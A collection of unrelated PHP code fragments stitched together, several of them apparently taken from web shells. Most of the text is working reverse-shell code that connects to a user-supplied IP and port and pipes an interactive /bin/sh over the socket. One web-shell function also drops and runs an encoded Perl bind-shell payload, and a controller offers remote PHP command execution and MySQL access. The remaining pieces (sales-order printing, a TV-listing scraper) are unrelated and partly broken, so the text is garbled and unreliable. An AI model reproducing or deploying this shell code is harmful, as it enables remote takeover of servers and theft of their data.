function print_sales_orders() { $from = $_REQUEST['PARAM_0']; $to = $_REQUEST['PARAM_1']; $currency = $_REQUEST['PARAM_2']; $bankaccount = $_REQUEST['PARAM_3']; $email = $_REQUEST['PARAM_4']; $quote = $_REQUEST['PARAM_5']; $comments = $_REQUEST['PARAM_6']; if ($from == null) { $from = 0; } if ($to == null) { $to = 0; } if ($from > 0) { printit($from, $to, $currency, $bank, $email, $quote, $commeents, ""); } }
} $input = fread($pipes[1], $chunk_size); if ($debug) { printit("STDOUT: {$input}"); } fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) { printit("STDERR READ"); } $input = fread($pipes[2], $chunk_size); if ($debug) { printit("STDERR: {$input}"); } fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit($string) { if (!$daemon) { print "{$string}\n";
function __construct() { if ($_SESSION['logged'] != TRUE && $_POST['cmd'] != 'login' && empty($_POST['pass'])) { $this->buildPageLogin(); } else { switch ($_POST['cmd']) { case 'browser': $browserTools = new BrowserTools(); switch ($_POST['method']) { case 'show': $this->buildPageStructure($browserTools->main($_POST['item'], false)); break; case 'execute': $this->buildPageStructure($browserTools->main($_POST['item'])); break; default: $this->buildPageStructure($browserTools->main('.')); break; } break; case 'logout': $this->logout(); break; case 'remove': $this->remove(); break; case 'php': $phpTools = new PhpTools(); switch ($_POST['method']) { case 'execute': $util = new Util(); $run = $util->execute($_POST['item']); foreach ($run as $row) { $resp[] = htmlentities(wordwrap($row, 100, ' ', TRUE), ENT_QUOTES); } $this->buildPageStructure($phpTools->main($resp)); break; default: $this->buildPageStructure($phpTools->main('')); break; } break; case 'mysql': $mySql = new MySQLTools(); switch ($_POST['method']) { case 'connect': if (!empty($_POST['userdb']) && !empty($_POST['serverdb']) && !empty($_POST['portdb'])) { $_SESSION['userdb'] = $_POST['userdb']; $_SESSION['passdb'] = $_POST['passdb']; $_SESSION['serverdb'] = $_POST['serverdb']; $_SESSION['portdb'] = $_POST['portdb']; if ($mySql->connect()) { $_SESSION['connected'] = TRUE; $this->buildPageStructure($mySql->main()); } else { $error = "\n <div class='alert'>\n <strong>Warning!</strong> " . $_SESSION['linkdb']->connect_error . "\n </div>\n "; $this->buildPageStructure($mySql->main($error)); } } break; case 'selectdb': if (!empty($_POST['item'])) { $_SESSION['db'] = $_POST['item']; if ($mySql->selectDb($_POST['item'])) { $this->buildPageStructure($mySql->main()); } else { $error = "\n <div class='alert'>\n <strong>Warning!</strong> Can't select the Database. Please try again.\n </div>\n "; $this->buildPageStructure($mySql->main($error)); } } break; case 'query': if (!empty($_POST['item'])) { if ($result = $mySql->execute($_POST['item'])) { $_SESSION['query'] = $result; $this->buildPageStructure($mySql->main()); } else { $error = "\n <div class='alert'>\n <strong>Warning!</strong> " . $_SESSION['linkdb']->error . "\n </div>\n "; $this->buildPageStructure($mySql->main($error)); } } break; case 'logout': $_SESSION['connected'] = NULL; $_SESSION['userdb'] = NULL; $_SESSION['passdb'] = NULL; $_SESSION['serverdb'] = NULL; $_SESSION['portdb'] = NULL; $_SESSION['db'] = NULL; $_SESSION['linkdb'] = NULL; $this->buildPageStructure($mySql->main()); break; default: $this->buildPageStructure($mySql->main()); break; } break; case 'reverse': $reverseTools = new ReverseTools(); switch ($_POST['method']) { case 'connect': if (isset($_POST['port']) && isset($_POST['ip']) && $_POST['port'] != "" && $_POST['ip'] != "") { $result = ""; $ip = $_POST['ip']; $port = $_POST['port']; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; /bin/sh -i'; $debug = 0; chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { echo "{$errstr} ({$errno})"; exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { echo "ERROR: Can't spawn shell"; exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); $result .= "Successfully opened reverse shell to {$ip}:{$port}"; while (1) { if (feof($sock)) { $result .= "ERROR: Shell connection terminated"; break; } if (feof($pipes[1])) { $result .= "ERROR: Shell process terminated"; break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) { printit("SOCK READ"); } $input = fread($sock, $chunk_size); if ($debug) { printit("SOCK: {$input}"); } fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) { printit("STDOUT READ"); } $input = fread($pipes[1], $chunk_size); if ($debug) { printit("STDOUT: {$input}"); } fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) { printit("STDERR READ"); } $input = fread($pipes[2], $chunk_size); if ($debug) { printit("STDERR: {$input}"); } fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); } $this->buildPageStructure($reverseTools->main()); break; default: $this->buildPageStructure($reverseTools->main('')); break; } break; case 'login': if (isset($_POST['pass']) && !empty($_POST['pass'])) { $this->login($_POST['pass']); } break; default: $info = new Info(); $this->buildPageStructure($info->main()); break; } } }
} if ($flag == 2) { $pid = $sql->last_record($result); $sql->query("update program set stop=INTERVAL 1 DAY + stop where pid={$pid}"); } } $count++; } // end while } // end function printit if ($WEB) { print_header_open(); print_title("Collecting ..."); print_header_close(); } while (list($zender, $url) = each($urls)) { $uur = array(); $programma = array(); $inhoud = array(); if ($WEB) { print "Slurping {$zender}...<br>\n"; } $inhoud = connecttohttpd($url, $host); list($programma, $uur, $film) = parsecontent($inhoud, $programma, $uur, $film); printit($programma, $uur, $film, $zender); } if ($WEB) { print "done<br>"; print_page_close(); }
function reverse_conn_bg() { global $os; $option = $_REQUEST['rev_option']; $ip = $_GET['my_ip']; $port = $_GET['my_port']; if ($option == "PHP Reverse Shell") { echo "<div id=result><h2>RESULT</h2><hr /><br />"; function printit($string) { if (!$daemon) { print "{$string}\n"; } } $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("{$errstr} ({$errno})"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("<font color=green>Successfully opened reverse shell to {$ip}:{$port} </font>"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) { printit("SOCK READ"); } $input = fread($sock, $chunk_size); if ($debug) { printit("SOCK: {$input}"); } fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) { printit("STDOUT READ"); } $input = fread($pipes[1], $chunk_size); if ($debug) { printit("STDOUT: {$input}"); } fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) { printit("STDERR READ"); } $input = fread($pipes[2], $chunk_size); if ($debug) { printit("STDERR: {$input}"); } fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); echo "<br /><br /><hr /><br /><br /></div>"; } else { if ($option == "PERL Bind Shell") { global $bind_perl, $os; $pbfl = $bind_perl; $handlr = fopen("indrajith_perl_bind.pl", "wb"); if ($handlr) { fwrite($handlr, gzinflate(base64_decode($bind_perl))); } else { alert("Access Denied for create new file"); } fclose($handlr); if (file_exists("indrajith_perl_bind.pl")) { if ($os == "nix") { cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl {$port}"); } else { cmd("perl indrajith_perl_bind.pl {$port}"); } } } } }
<?php $_POST["user_name_entry_field"] = "admin"; $_POST["company_login_name"] = "0"; $_POST["password"] = "******"; $page_security = 1; include "includes/session.inc"; chdir("./sales"); # printing of orders/quotes is called from sales directory include "../reporting/includes/reporting.inc"; include "../reporting/includes/pdf_report.inc"; include "../reporting/rep109.php"; $sql = "SELECT sales_orders.order_no from sales_orders where order_no=20"; $result = db_query($sql, $db); if ($result) { while ($myrow = db_fetch($result)) { $nr = $myrow[0]; } $bank = get_first_bank_account(); $quote = 1; $comments = ""; printit($nr, $nr, "CHF", $bank, 0, $quote, "", "/tmp/output.pdf"); }
if (!is_resource($process)) { printit("ERROR: Can't spawn shell<br>"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to {$ip}:{$port}<br>"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated<br>"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated<br>"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { $input = fread($pipes[2], $chunk_size); fwrite($sock, $input);